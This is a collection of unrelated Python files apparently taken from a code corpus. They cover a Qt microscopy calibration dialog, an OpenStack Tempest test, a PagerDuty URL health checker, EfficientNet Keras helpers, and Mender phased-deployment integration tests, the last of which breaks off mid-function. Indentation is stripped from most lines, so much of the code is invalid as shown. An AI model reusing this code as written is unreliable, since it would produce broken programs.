+ equationC
)
# SET VALUES TO FIELDS AND CALL DEPENDENCIES
self.psfEdit.setValue(psf)
self.integrationtimeEdit.setValue(integrationtime)
self.photonrateEdit.setValue(photonrate)
self.photonratestdEdit.setValue(photonratestd)
self.photonslopeEdit.setValue(photonrate / laserpower)
self.photonslopeStdEdit.setValue(
photonratestd / laserpower
)
# SET NOISE AND FRAME
self.BgoffsetEdit.setValue(bgmu - bgmodel)
self.BgStdoffsetEdit.setValue(bgstd - bgmodelstd)
self.imagerconcentrationEdit.setValue(imagerconcentration)
self.laserpowerEdit.setValue(laserpower)
class CalibrationDialog(QtWidgets.QDialog):
def __init__(self, parent=None):
super(CalibrationDialog, self).__init__(parent)
layout = QtWidgets.QVBoxLayout(self)
self.table = QtWidgets.QTableWidget()
self.table.setWindowTitle("Noise Model Calibration")
self.setWindowTitle("Noise Model Calibration")
# self.resize(800, 400)
layout.addWidget(self.table)
# ADD BUTTONS:
self.loadTifButton = QtWidgets.QPushButton("Load Tifs")
layout.addWidget(self.loadTifButton)
self.evalTifButton = QtWidgets.QPushButton("Evaluate Tifs")
layout.addWidget(self.evalTifButton)
self.pbar = QtWidgets.QProgressBar(self)
layout.addWidget(self.pbar)
self.loadTifButton.clicked.connect(self.loadTif)
self.evalTifButton.clicked.connect(self.evalTif)
self.buttons = QDialogButtonBox(
QDialogButtonBox.ActionRole
| QDialogButtonBox.Ok
| QDialogButtonBox.Cancel,
Qt.Horizontal,
self,
)
layout.addWidget(self.buttons)
self.buttons.accepted.connect(self.accept)
self.buttons.rejected.connect(self.reject)
def exportTable(self):
table = dict()
tablecontent = []
tablecontent.append(
[
"FileName",
"Imager concentration[nM]",
"Integration time [ms]",
"Laserpower",
"Mean [Photons]",
"Std [Photons]",
]
)
for row in range(self.table.rowCount()):
rowdata = []
for column in range(self.table.columnCount()):
item = self.table.item(row, column)
if item is not None:
rowdata.append(item.text())
else:
rowdata.append("")
tablecontent.append(rowdata)
table[0] = tablecontent
path, ext = QtWidgets.QFileDialog.getSaveFileName(
self, "Export calibration table to.", filter="*.csv"
)
if path:
self.savePlate(path, table)
def savePlate(self, filename, data):
with open(filename, "w", newline="") as csvfile:
Writer = csv.writer(
csvfile,
delimiter=",",
quotechar="|",
quoting=csv.QUOTE_MINIMAL,
)
for j in range(0, len(data)):
exportdata = data[j]
for i in range(0, len(exportdata)):
Writer.writerow(exportdata[i])
def evalTif(self):
baseline, ok1 = QtWidgets.QInputDialog.getText(
self, "Input Dialog", "Enter Camera Baseline:"
)
if ok1:
baseline = int(baseline)
else:
baseline = 200 # default
        sensitivity, ok2 = QtWidgets.QInputDialog.getText(
            self, "Input Dialog", "Enter Camera Sensitivity:"
        )
        if ok2:
            sensitivity = float(sensitivity)
        else:
            sensitivity = 1.47
counter = 0
for element in self.tifFiles:
counter = counter + 1
            self.pbar.setValue(int((counter - 1) / self.tifCounter * 100))
print(
"Current Dataset: "
+ str(counter)
+ " of "
+ str(self.tifCounter)
)
QtWidgets.qApp.processEvents()
movie, info = _io.load_movie(element)
movie = movie[0:100, :, :]
            movie = (movie - baseline) * sensitivity
self.table.setItem(
counter - 1, 4, QtWidgets.QTableWidgetItem(str((_np.mean(movie))))
)
self.table.setItem(
counter - 1, 5, QtWidgets.QTableWidgetItem(str((_np.std(movie))))
)
self.table.setItem(
counter - 1,
1,
QtWidgets.QTableWidgetItem(str((self.ValueFind(element, "nM_")))),
)
self.table.setItem(
counter - 1,
2,
QtWidgets.QTableWidgetItem(str((self.ValueFind(element, "ms_")))),
)
self.table.setItem(
counter - 1,
3,
QtWidgets.QTableWidgetItem(str((self.ValueFind(element, "mW_")))),
)
self.pbar.setValue(100)
def ValueFind(self, filename, unit):
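        # Parse the integer (up to four digits) that immediately precedes the
        # unit substring in the filename, e.g. "..._500nM_..." -> 500.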
index = filename.index(unit)
value = 0
for i in range(4):
try:
value += int(filename[index - 1 - i]) * (10 ** i)
except ValueError:
pass
return value
def loadTif(self):
self.path = QtWidgets.QFileDialog.getExistingDirectory(
self, "Select Directory"
)
if self.path:
self.tifCounter = len(_glob.glob1(self.path, "*.tif"))
self.tifFiles = _glob.glob(os.path.join(self.path, "*.tif"))
self.table.setRowCount(int(self.tifCounter))
self.table.setColumnCount(6)
self.table.setHorizontalHeaderLabels(
[
"FileName",
"Imager concentration[nM]",
"Integration time [ms]",
"Laserpower",
"Mean [Photons]",
"Std [Photons]",
]
)
for i in range(0, self.tifCounter):
self.table.setItem(
i, 0, QtWidgets.QTableWidgetItem(self.tifFiles[i])
)
def changeComb(self, indexval):
sender = self.sender()
comboval = sender.currentIndex()
if comboval == 0:
self.table.setItem(indexval, 2, QtWidgets.QTableWidgetItem(""))
self.table.setItem(indexval, 3, QtWidgets.QTableWidgetItem(""))
else:
self.table.setItem(
indexval,
2,
QtWidgets.QTableWidgetItem(self.ImagersShort[comboval]),
)
self.table.setItem(
indexval, 3, QtWidgets.QTableWidgetItem(self.ImagersLong[comboval])
)
def readoutTable(self):
tableshort = dict()
tablelong = dict()
maxcolor = 15
for i in range(0, maxcolor - 1):
try:
tableshort[i] = self.table.item(i, 2).text()
if tableshort[i] == "":
tableshort[i] = "None"
except AttributeError:
tableshort[i] = "None"
try:
tablelong[i] = self.table.item(i, 3).text()
if tablelong[i] == "":
tablelong[i] = "None"
except AttributeError:
tablelong[i] = "None"
return tablelong, tableshort
    # collect the calibration values entered in the table
def evalTable(self):
conc = []
time = []
las = []
bg = []
bgstd = []
for i in range(0, self.tifCounter):
conc.append(float(self.table.item(i, 1).text()))
time.append(float(self.table.item(i, 2).text()))
las.append(float(self.table.item(i, 3).text()))
bg.append(float(self.table.item(i, 4).text()))
bgstd.append(float(self.table.item(i, 5).text()))
# self.exportTable()
return bg, bgstd, las, time, conc
    # static method to create the dialog and return (bg, bgstd, las, time, conc, accepted)
@staticmethod
def setExt(parent=None):
dialog = CalibrationDialog(parent)
result = dialog.exec_()
bg, bgstd, las, time, conc = dialog.evalTable()
return (bg, bgstd, las, time, conc, result == QDialog.Accepted)
def main():
app = QtWidgets.QApplication(sys.argv)
window = Window()
window.show()
sys.exit(app.exec_())
def excepthook(type, value, tback):
lib.cancel_dialogs()
message = "".join(traceback.format_exception(type, value, tback))
    QtWidgets.QMessageBox.critical(
        window, "An error occurred", message
    )
sys.__excepthook__(type, value, tback)
sys.excepthook = excepthook
if __name__ == "__main__":
main()
|
the-stack_106_23269 | # Copyright 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest.api.volume import base
from tempest.lib import decorators
class VolumeHostsAdminTestsJSON(base.BaseVolumeAdminTest):
@decorators.idempotent_id('d5f3efa2-6684-4190-9ced-1c2f526352ad')
def test_list_hosts(self):
hosts = self.admin_hosts_client.list_hosts()['hosts']
        self.assertGreaterEqual(len(hosts), 2, "No. of hosts are < 2, "
                                "response of list hosts is: %s" % hosts)
|
the-stack_106_23270 | from collections import deque
import logging
import time
import socket
import hashlib
import requests
import pdpyras
import yaml
LOG = logging.getLogger(__name__)
hostname = socket.getfqdn()
class Check(object):
def __init__(self, url, pd_api_key, **kwargs):
self.url = url
self.pd_api_key = pd_api_key
self.previous_checks = deque(maxlen=10)
sha = hashlib.sha256()
sha.update(url.encode("ascii"))
self.dup_key = sha.hexdigest()
def run(self):
status = 0
resp_text = ""
exc_text = ""
try:
resp = requests.get(self.url)
resp_text = resp.text
resp.raise_for_status()
except Exception as ex:
status = 1
exc_text = str(ex)
LOG.info("Check results: status=%r body=%r exc=%r" % (status, resp_text, exc_text))
self.previous_checks.append(status)
self._report({"body": resp_text, "exception": exc_text})
def _report(self, data):
pd = pdpyras.EventsAPISession(self.pd_api_key)
if len(list(filter(lambda x: x != 0, list(self.previous_checks)[-2:]))) >= 2:
# last two are consecutive failures
LOG.info("Reporting as triggered")
pd.trigger(
"Service at %s is DOWN" % self.url,
source=hostname,
severity="critical",
custom_details=data,
dedup_key=self.dup_key
)
else:
LOG.info("Reporting as resolved")
pd.resolve(self.dup_key)
def main():
with open("./watchman.yaml") as watchfile:
watch_data = yaml.safe_load(watchfile)
checks = []
for check in watch_data.get("checks", []):
checks.append(Check(**check))
while True:
try:
for check in checks:
check.run()
except Exception as ex:
LOG.exception("error in main loop: %s" % ex)
time.sleep(60)
if __name__ == "__main__":
logging.basicConfig(level=logging.INFO)
main()
|
the-stack_106_23273 | # Copyright 2019 The TensorFlow Authors, Pavel Yakubovskiy. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import functools
import cv2
import numpy as np
_KERAS_BACKEND = None
_KERAS_LAYERS = None
_KERAS_MODELS = None
_KERAS_UTILS = None
def get_submodules_from_kwargs(kwargs):
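    # Resolve the Keras submodules (backend/layers/models/utils) from kwargs,
    # falling back to the module-level defaults when a key is not supplied.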
backend = kwargs.get('backend', _KERAS_BACKEND)
layers = kwargs.get('layers', _KERAS_LAYERS)
models = kwargs.get('models', _KERAS_MODELS)
utils = kwargs.get('utils', _KERAS_UTILS)
for key in kwargs.keys():
if key not in ['backend', 'layers', 'models', 'utils']:
            raise TypeError('Invalid keyword argument: %s' % key)
return backend, layers, models, utils
def inject_keras_modules(func):
import keras
@functools.wraps(func)
def wrapper(*args, **kwargs):
kwargs['backend'] = keras.backend
kwargs['layers'] = keras.layers
kwargs['models'] = keras.models
kwargs['utils'] = keras.utils
return func(*args, **kwargs)
return wrapper
def inject_tfkeras_modules(func):
import tensorflow.keras as tfkeras
@functools.wraps(func)
def wrapper(*args, **kwargs):
kwargs['backend'] = tfkeras.backend
kwargs['layers'] = tfkeras.layers
kwargs['models'] = tfkeras.models
kwargs['utils'] = tfkeras.utils
return func(*args, **kwargs)
return wrapper
def init_keras_custom_objects():
import keras
import efficientnet as model
custom_objects = {
'swish': inject_keras_modules(model.get_swish)(),
'FixedDropout': inject_keras_modules(model.get_dropout)()
}
keras.utils.generic_utils.get_custom_objects().update(custom_objects)
def init_tfkeras_custom_objects():
import tensorflow.keras as tfkeras
import efficientnet as model
custom_objects = {
'swish': inject_tfkeras_modules(model.get_swish)(),
'FixedDropout': inject_tfkeras_modules(model.get_dropout)()
}
tfkeras.utils.get_custom_objects().update(custom_objects)
def normalize_image(image):
"""
Normalize image by subtracting and dividing by the pre-computed
mean and std. dev. Operates on image in-place
"""
mean = [0.485, 0.456, 0.406]
std = [0.229, 0.224, 0.225]
image[..., 0] -= mean[0]
image[..., 1] -= mean[1]
image[..., 2] -= mean[2]
image[..., 0] /= std[0]
image[..., 1] /= std[1]
image[..., 2] /= std[2]
def resize_image(image, image_size):
"""Resize images to image_size."""
image_height, image_width = image.shape[:2]
# check if image needs to be resized
if image_height == image_width == image_size:
return image, 0, 0, 0
# scale the image dimensions to fit into the new size without distortion
if image_height > image_width:
scale = image_size / image_height
resized_height = image_size
resized_width = int(image_width * scale)
else:
scale = image_size / image_width
resized_height = int(image_height * scale)
resized_width = image_size
# Resize the input image to fit
image = cv2.resize(image, (resized_width, resized_height))
offset_h = (image_size - resized_height) // 2
offset_w = (image_size - resized_width) // 2
# Paste the input image into the center of a grey image of target size
new_image = 128 * np.ones((image_size, image_size, 3), dtype=image.dtype)
new_image[offset_h:offset_h + resized_height,
offset_w:offset_w + resized_width] = image
return new_image, scale, offset_h, offset_w
def preprocess_image(image, image_size):
resized_image, scale, offset_h, offset_w = resize_image(image, image_size)
return resized_image, scale, offset_h, offset_w
|
the-stack_106_23274 | # Copyright 2021 Northern.tech AS
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
import multiprocessing as mp
import os
import random
import time
import uuid
from datetime import datetime, timedelta
import testutils.api.deviceauth as deviceauth
import testutils.api.useradm as useradm
import testutils.api.inventory as inventory
import testutils.api.inventory_v2 as inventory_v2
import testutils.api.deployments as deployments
import testutils.api.deployments_v2 as deployments_v2
from testutils.api.client import ApiClient
from testutils.common import (
create_org,
create_user,
clean_mongo,
mongo_cleanup,
mongo,
get_mender_artifact,
make_accepted_device,
make_accepted_devices,
)
from testutils.infra.container_manager.kubernetes_manager import isK8S
WAITING_MULTIPLIER = 8 if isK8S() else 1
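# WAITING_MULTIPLIER stretches every sleep/wait interval used below when the
# tests run against a Kubernetes (staging) environment, where requests and
# scheduling are expected to take noticeably longer than in the local setup.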
def upload_image(filename, auth_token, description="abc"):
api_client = ApiClient(deployments.URL_MGMT)
api_client.headers = {}
r = api_client.with_auth(auth_token).call(
"POST",
deployments.URL_DEPLOYMENTS_ARTIFACTS,
files=(
("description", (None, description)),
("size", (None, str(os.path.getsize(filename)))),
("artifact", (filename, open(filename, "rb"), "application/octet-stream")),
),
)
assert r.status_code == 201
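# Usage sketch (illustrative; utoken is whatever management-API JWT the test
# obtained when logging in):
#
#   upload_image("/tests/test-artifact.mender", utoken, description="test artifact")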
def create_tenant_test_setup(
user_name, tenant_name, nr_deployments=3, nr_devices=100, plan="os"
):
"""
    Creates a tenant and a user belonging to it, then creates
    'nr_deployments' deployments, each targeting 'nr_devices' dummy devices.
"""
api_mgmt_deploy = ApiClient(deployments.URL_MGMT)
tenant = create_org(tenant_name, user_name, "correcthorse", plan=plan)
user = tenant.users[0]
r = ApiClient(useradm.URL_MGMT).call(
"POST", useradm.URL_LOGIN, auth=(user.name, user.pwd)
)
assert r.status_code == 200
user.utoken = r.text
tenant.users = [user]
upload_image("/tests/test-artifact.mender", user.utoken)
    # Create 'nr_deployments' deployments for the user
for i in range(nr_deployments):
request_body = {
"name": str(i) + "st-dummy-deployment",
"artifact_name": "deployments-phase-testing",
"devices": ["uuid not needed" + str(i) for i in range(nr_devices)],
}
resp = api_mgmt_deploy.with_auth(user.utoken).call(
"POST", "/deployments", body=request_body
)
assert resp.status_code == 201
# Verify that the 'nr_deployments' expected deployments have been created
resp = api_mgmt_deploy.with_auth(user.utoken).call("GET", "/deployments")
assert resp.status_code == 200
assert len(resp.json()) == nr_deployments
return tenant
@pytest.fixture(scope="function")
def setup_deployments_enterprise_test(
clean_mongo, existing_deployments=3, nr_devices=100, plan="enterprise"
):
"""
    Creates two tenants, with one user each, where each user has three deployments
    targeting a hundred dummy devices each.
"""
uuidv4 = str(uuid.uuid4())
tenant1 = create_tenant_test_setup(
"some.user+" + uuidv4 + "@example.com", "test.mender.io-" + uuidv4, plan=plan
)
# Add a second tenant to make sure that the functionality does not interfere with other tenants
uuidv4 = str(uuid.uuid4())
tenant2 = create_tenant_test_setup(
"some.user+" + uuidv4 + "@example.com", "test.mender.io-" + uuidv4, plan=plan
)
    # Each tenant was created with three predefined deployments (see
    # create_tenant_test_setup) that act as noise for the server to handle
return tenant1, tenant2
class TestDeploymentsEndpointEnterprise(object):
#
# The test_cases array consists of test tuples of the form:
# (request, expected_response)
#
test_cases = [
# One phase:
# + start_time
# + batch_size
(
{
"name": "One phase, with start time, and full batch size",
"artifact_name": "deployments-phase-testing",
"devices": ["dummyuuid" + str(i) for i in range(100)],
"phases": [
{
"start_ts": str(
(datetime.utcnow() + timedelta(days=1)).isoformat("T")
)
+ "Z",
"batch_size": 100,
}
],
},
{
"name": "One phase, with start time, and full batch size",
"artifact_name": "deployments-phase-testing",
"device_count": 0,
"max_devices": 100,
"phases": [{"batch_size": 100}],
},
),
# One phase:
# + start_time
# - batch_size
(
{
"name": "One phase, with start time",
"artifact_name": "deployments-phase-testing",
"devices": ["dummyuuid" + str(i) for i in range(100)],
"phases": [
{
"start_ts": str(
(datetime.utcnow() + timedelta(days=1)).isoformat("T")
)
+ "Z"
}
],
},
{
"name": "One phase, with start time",
"artifact_name": "deployments-phase-testing",
"device_count": 0,
"max_devices": 100,
},
),
# One phase:
# - start_time
# + batch_size
(
{
"name": "One phase, with no start time, and full batch size",
"artifact_name": "deployments-phase-testing",
"devices": ["dummyuuid" + str(i) for i in range(100)],
"phases": [{"batch_size": 100}],
},
{
"name": "One phase, with no start time, and full batch size",
"artifact_name": "deployments-phase-testing",
"device_count": 0,
"max_devices": 100,
"phases": [{"batch_size": 100}],
},
),
# Two phases:
# first:
# + start_time
# + batch_size
# last:
# + start_time
# + batch_size
(
{
"name": "Two phases, with start time and batch, last with start time and batch size",
"artifact_name": "deployments-phase-testing",
"devices": ["dummyuuid" + str(i) for i in range(100)],
"phases": [
{
"start_ts": str(
(datetime.utcnow() + timedelta(days=1)).isoformat("T")
)
+ "Z",
"batch_size": 10,
},
{
"start_ts": str(
(datetime.utcnow() + timedelta(days=1)).isoformat("T")
)
+ "Z",
"batch_size": 90,
},
],
},
{
"name": "Two phases, with start time and batch, last with start time and batch size",
"artifact_name": "deployments-phase-testing",
"device_count": 0,
"max_devices": 100,
"phases": [{"batch_size": 10}, {"batch_size": 90}],
},
),
# Two phases:
# first:
# - start_time
# + batch_size
# last:
# + start_time
# + batch_size
(
{
"name": "Two phases, with no start time and batch, last with start time and batch size",
"artifact_name": "deployments-phase-testing",
"devices": ["dummyuuid" + str(i) for i in range(100)],
"phases": [
{"batch_size": 10},
{
"start_ts": str(
(datetime.utcnow() + timedelta(days=1)).isoformat("T")
)
+ "Z",
"batch_size": 90,
},
],
},
{
"name": "Two phases, with no start time and batch, last with start time and batch size",
"artifact_name": "deployments-phase-testing",
"device_count": 0,
"max_devices": 100,
"phases": [{"batch_size": 10}, {"batch_size": 90}],
},
),
# Two phases:
# first:
# - start_time
# + batch_size
# last:
# + start_time
# - batch_size
(
{
"name": "Two phases, with no start time and batch, last with start time",
"artifact_name": "deployments-phase-testing",
"devices": ["dummyuuid" + str(i) for i in range(100)],
"phases": [
{"batch_size": 10},
{
"start_ts": str(
(datetime.utcnow() + timedelta(days=1)).isoformat("T")
)
+ "Z"
},
],
},
{
"name": "Two phases, with no start time and batch, last with start time",
"artifact_name": "deployments-phase-testing",
"device_count": 0,
"max_devices": 100,
"phases": [{"batch_size": 10}, {"batch_size": 90}],
},
),
# Three phases:
# first phase:
# + start_time
# + batch_size
# last phase:
# + start_time
# + batch_size
(
{
"name": "Three phases, first start and batch, last start and batch",
"artifact_name": "deployments-phase-testing",
"devices": ["dummyuuid" + str(i) for i in range(100)],
"phases": [
{
"start_time": str(
(datetime.utcnow() + timedelta(days=1)).isoformat("T")
)
+ "Z",
"batch_size": 10,
},
{
"start_ts": str(
(datetime.utcnow() + timedelta(days=1)).isoformat("T")
)
+ "Z",
"batch_size": 45,
},
{
"start_ts": str(
(datetime.utcnow() + timedelta(days=2)).isoformat("T")
)
+ "Z",
"batch_size": 45,
},
],
},
{
"name": "Three phases, first start and batch, last start and batch",
"artifact_name": "deployments-phase-testing",
"device_count": 0,
"max_devices": 100,
"phases": [
{
"batch_size": 10,
# The nr of devices that asked for an update within the phase, in this case 0
"device_count": 0,
},
{"batch_size": 45, "device_count": 0},
{"batch_size": 45, "device_count": 0},
],
},
),
# Three phases:
# first phase:
# - start_time
# + batch_size
# last phase:
# + start_time
# + batch_size
(
{
"name": "Three phases, first batch, last start and batch",
"artifact_name": "deployments-phase-testing",
"devices": ["dummyuuid" + str(i) for i in range(100)],
"phases": [
{"batch_size": 10},
{
"start_ts": str(
(datetime.utcnow() + timedelta(days=1)).isoformat("T")
)
+ "Z",
"batch_size": 45,
},
{
"start_ts": str(
(datetime.utcnow() + timedelta(days=2)).isoformat("T")
)
+ "Z",
"batch_size": 45,
},
],
},
{
"name": "Three phases, first batch, last start and batch",
"artifact_name": "deployments-phase-testing",
"device_count": 0,
"max_devices": 100,
"phases": [
{"batch_size": 10, "device_count": 0},
{"batch_size": 45, "device_count": 0},
{"batch_size": 45, "device_count": 0},
],
},
),
# Three phases:
# first phase:
# - start_time
# + batch_size
# last phase:
# + start_time
# - batch_size
(
{
"name": "Three phases, first batch, last start",
"artifact_name": "deployments-phase-testing",
"devices": ["dummyuuid" + str(i) for i in range(100)],
"phases": [
{"batch_size": 10},
{
"start_ts": str(
(datetime.utcnow() + timedelta(days=1)).isoformat("T")
)
+ "Z",
"batch_size": 45,
},
{
"start_ts": str(
(datetime.utcnow() + timedelta(days=2)).isoformat("T")
)
+ "Z",
# Batch size is optional in the last stage (ie, it is the remaining devices)
},
],
},
{
"name": "Three phases, first batch, last start",
"artifact_name": "deployments-phase-testing",
"device_count": 0,
"max_devices": 100,
"phases": [
{
"batch_size": 10,
# The nr of devices that asked for an update within the phase, in this case 0
"device_count": 0,
},
{"batch_size": 45, "device_count": 0},
{"batch_size": 45, "device_count": 0},
],
},
),
        # Five phases, just to make sure it works. Should behave like all other multi-phase cases
(
{
"name": "Five phases, first no start time, last start time, no batch size",
"artifact_name": "deployments-phase-testing",
"devices": ["dummyuuid" + str(i) for i in range(100)],
"phases": [
{
# Start time is optional in the first stage (default to now)
"batch_size": 10
},
{
"start_ts": str(
(datetime.utcnow() + timedelta(days=1)).isoformat("T")
)
+ "Z",
"batch_size": 10,
},
{
"start_ts": str(
(datetime.utcnow() + timedelta(days=1)).isoformat("T")
)
+ "Z",
"batch_size": 10,
},
{
"start_ts": str(
(datetime.utcnow() + timedelta(days=1)).isoformat("T")
)
+ "Z",
"batch_size": 10,
},
{
"start_ts": str(
(datetime.utcnow() + timedelta(days=2)).isoformat("T")
)
+ "Z",
# Batch size is optional in the last stage (ie, it is the remaining devices)
},
],
},
{
"name": "Five phases, first no start time, last start time, no batch size",
"artifact_name": "deployments-phase-testing",
"device_count": 0,
"max_devices": 100,
"phases": [
{"batch_size": 10, "device_count": 0},
{"batch_size": 10, "device_count": 0},
{"batch_size": 10, "device_count": 0},
{"batch_size": 10, "device_count": 0},
{"batch_size": 60, "device_count": 0},
],
},
),
]
@pytest.mark.parametrize("test_case", test_cases)
def test_phased_deployments_success(
self, test_case, setup_deployments_enterprise_test
):
deploymentclient = ApiClient(deployments.URL_MGMT)
tenant1, tenant2 = setup_deployments_enterprise_test
resp = deploymentclient.with_auth(tenant2.users[0].utoken).call(
"GET", "/deployments"
)
assert resp.status_code == 200
# Store the second tenants user deployments, to verify that
# it remains unchanged after the tests have run
backup_tenant_user_deployments = resp.json()
request_body, expected_response = test_case
resp = deploymentclient.with_auth(tenant1.users[0].utoken).call(
"POST", "/deployments", body=request_body
)
assert resp.status_code == 201
deployment_id = os.path.basename(resp.headers["Location"])
resp = deploymentclient.with_auth(tenant1.users[0].utoken).call(
"GET", "/deployments"
)
assert resp.status_code == 200
assert len(resp.json()) == 4
# Get the test deployment from the list
reg_response_body_dict = None
for deployment in resp.json():
if deployment["name"] == expected_response["name"]:
reg_response_body_dict = deployment
resp = deploymentclient.with_auth(tenant1.users[0].utoken).call(
"GET", "/deployments/" + deployment_id
)
assert resp.status_code == 200
id_response_body_dict = resp.json()
assert reg_response_body_dict == id_response_body_dict
TestDeploymentsEndpointEnterprise.compare_response_json(
expected_response, id_response_body_dict
)
        # Verify that the second tenant's deployments remain untouched
resp = deploymentclient.with_auth(tenant2.users[0].utoken).call(
"GET", "/deployments"
)
assert resp.status_code == 200
assert backup_tenant_user_deployments == resp.json()
def compare_response_json(expected_response, response_body_json):
"""Compare the keys that are present in the expected json dict with the matching response keys.
Ignore those response keys which are not present in the expected dictionary"""
for key in expected_response.keys() & response_body_json.keys():
if key == "phases":
TestDeploymentsEndpointEnterprise.compare_phases_json(
expected_response["phases"], response_body_json["phases"]
)
else:
assert expected_response[key] == response_body_json[key]
def compare_phases_json(expected, response):
"""phases is a list of phases json objects. Compare them"""
assert len(expected) == len(response)
# The phases are a list of phase objects. Compare them on matching keys
for exp, rsp in zip(expected, response):
for k in exp.keys() & rsp.keys():
assert exp[k] == rsp[k]
def setup_devices_and_management_st(nr_devices=100, deploy_to_group=None):
"""
    Sets up a user and creates authorized devices.
"""
user = create_user("[email protected]", "correcthorse")
useradmm = ApiClient(useradm.URL_MGMT)
devauthd = ApiClient(deviceauth.URL_DEVICES)
devauthm = ApiClient(deviceauth.URL_MGMT)
invm = ApiClient(inventory.URL_MGMT)
# log in user
r = useradmm.call("POST", useradm.URL_LOGIN, auth=(user.name, user.pwd))
assert r.status_code == 200
utoken = r.text
# Upload a dummy artifact to the server
upload_image("/tests/test-artifact.mender", utoken)
# prepare accepted devices
devs = make_accepted_devices(devauthd, devauthm, utoken, "", nr_devices)
# wait for devices to be provisioned
time.sleep(3)
if deploy_to_group:
for device in devs[:-1]:
r = invm.with_auth(utoken).call(
"PUT",
inventory.URL_DEVICE_GROUP.format(id=device.id),
body={"group": deploy_to_group},
)
assert r.status_code == 204
    # Check that the expected number of devices was created
r = invm.with_auth(utoken).call(
"GET", inventory.URL_DEVICES, qs_params={"per_page": nr_devices}
)
assert r.status_code == 200
api_devs = r.json()
assert len(api_devs) == nr_devices
return user, utoken, devs
def setup_devices_and_management_mt(nr_devices=100, deploy_to_group=None):
"""
    Sets up a user and a tenant, and creates authorized devices.
"""
uuidv4 = str(uuid.uuid4())
tenant = create_org(
"test.mender.io-" + uuidv4,
"some.user+" + uuidv4 + "@example.com",
"correcthorse",
plan="enterprise",
)
user = tenant.users[0]
useradmm = ApiClient(useradm.URL_MGMT)
devauthd = ApiClient(deviceauth.URL_DEVICES)
devauthm = ApiClient(deviceauth.URL_MGMT)
invm = ApiClient(inventory.URL_MGMT)
# log in user
r = useradmm.call("POST", useradm.URL_LOGIN, auth=(user.name, user.pwd))
assert r.status_code == 200
utoken = r.text
# Upload a dummy artifact to the server
upload_image("/tests/test-artifact.mender", utoken)
# prepare accepted devices
devs = make_accepted_devices(
devauthd, devauthm, utoken, tenant.tenant_token, nr_devices
)
# wait for devices to be provisioned
time.sleep(3)
if deploy_to_group:
for device in devs[:-1]:
r = invm.with_auth(utoken).call(
"PUT",
inventory.URL_DEVICE_GROUP.format(id=device.id),
body={"group": deploy_to_group},
)
assert r.status_code == 204
    # Check that the expected number of devices was created
r = invm.with_auth(utoken).call(
"GET", inventory.URL_DEVICES, qs_params={"per_page": nr_devices}
)
assert r.status_code == 200
api_devs = r.json()
assert len(api_devs) == nr_devices
return user, tenant, utoken, devs
def try_update(
device, default_artifact_name="bugs-bunny", default_device_type="qemux86-64"
):
"""
    Try to make an update with a device.
    :param device: the device attempting the update
    :param default_artifact_name: default artifact name of the
                                  artifact used in the request
    :param default_device_type: default device type used in the request
    :return: the status code of the GET /deployments/next request
NOTE: You can override the device type and artifact name
by creating a device_type/artifact_name member of the
Device object.
"""
api_dev_deploy = ApiClient(deployments.URL_DEVICES)
# Try to retrieve next update and assert expected status code
resp = api_dev_deploy.with_auth(device.token).call(
"GET",
deployments.URL_NEXT,
qs_params={
"artifact_name": getattr(device, "artifact_name", default_artifact_name),
"device_type": getattr(device, "device_type", default_device_type),
},
)
if resp.status_code == 200:
# Update device status upon successful request
api_dev_deploy.with_auth(device.token).call(
"PUT",
deployments.URL_STATUS.format(id=resp.json()["id"]),
body={"status": "success"},
)
return resp.status_code
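# Usage sketch: poll for the next deployment as a given device and branch on the
# returned status code (200 = update available, 204 = nothing to do):
#
#   status_code = try_update(device)
#   if status_code == 200:
#       device.artifact_name = "deployments-phase-testing"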
class TestDeploymentsEnterprise(object):
def test_regular_deployment(self, clean_mongo):
user, tenant, utoken, devs = setup_devices_and_management_mt()
api_mgmt_dep = ApiClient(deployments.URL_MGMT)
# Make deployment request
deployment_req = {
"name": "phased-deployment",
"artifact_name": "deployments-phase-testing",
"devices": [dev.id for dev in devs],
}
api_mgmt_dep.with_auth(utoken).call(
"POST", deployments.URL_DEPLOYMENTS, deployment_req
)
for dev in devs:
status_code = try_update(dev)
assert status_code == 200
dev.artifact_name = deployment_req["artifact_name"]
for dev in devs:
# Deployment already finished
status_code = try_update(dev)
assert status_code == 204
deployment_req["name"] = "really-old-update"
api_mgmt_dep.with_auth(utoken).call(
"POST", deployments.URL_DEPLOYMENTS, deployment_req
)
for dev in devs:
# Already installed
status_code = try_update(dev)
assert status_code == 204
class TestPhasedRolloutDeploymentsEnterprise:
def try_phased_updates(
self, deployment, devices, user_token, expected_update_status=200
):
# Static helper function
# Setup Deployment APIs
api_mgmt_deploy = ApiClient(deployments.URL_MGMT)
devices_updated = 0
num_phases = len(deployment["phases"])
batch_sizes = [
int((deployment["phases"][i]["batch_size"] / 100.0) * len(devices))
for i in range(num_phases - 1)
]
# Final batch_size might not be specified
batch_sizes.append(len(devices) - sum(batch_sizes))
# POST deployment
resp = api_mgmt_deploy.with_auth(user_token).call(
"POST", deployments.URL_DEPLOYMENTS, body=deployment
)
assert resp.status_code == 201
# Store the location from the GET /deployments/{id} request
deployment_id = os.path.basename(resp.headers["Location"])
for i in range(num_phases):
if i == 0 and "start_ts" not in deployment["phases"][i]:
                # The first phase doesn't need to specify `start_ts`
pass
elif "start_ts" in deployment["phases"][i]:
# Sleep until next phase starts
start_ts = datetime.strptime(
deployment["phases"][i]["start_ts"], "%Y-%m-%dT%H:%M:%SZ"
)
now = datetime.utcnow()
# While phase in progress
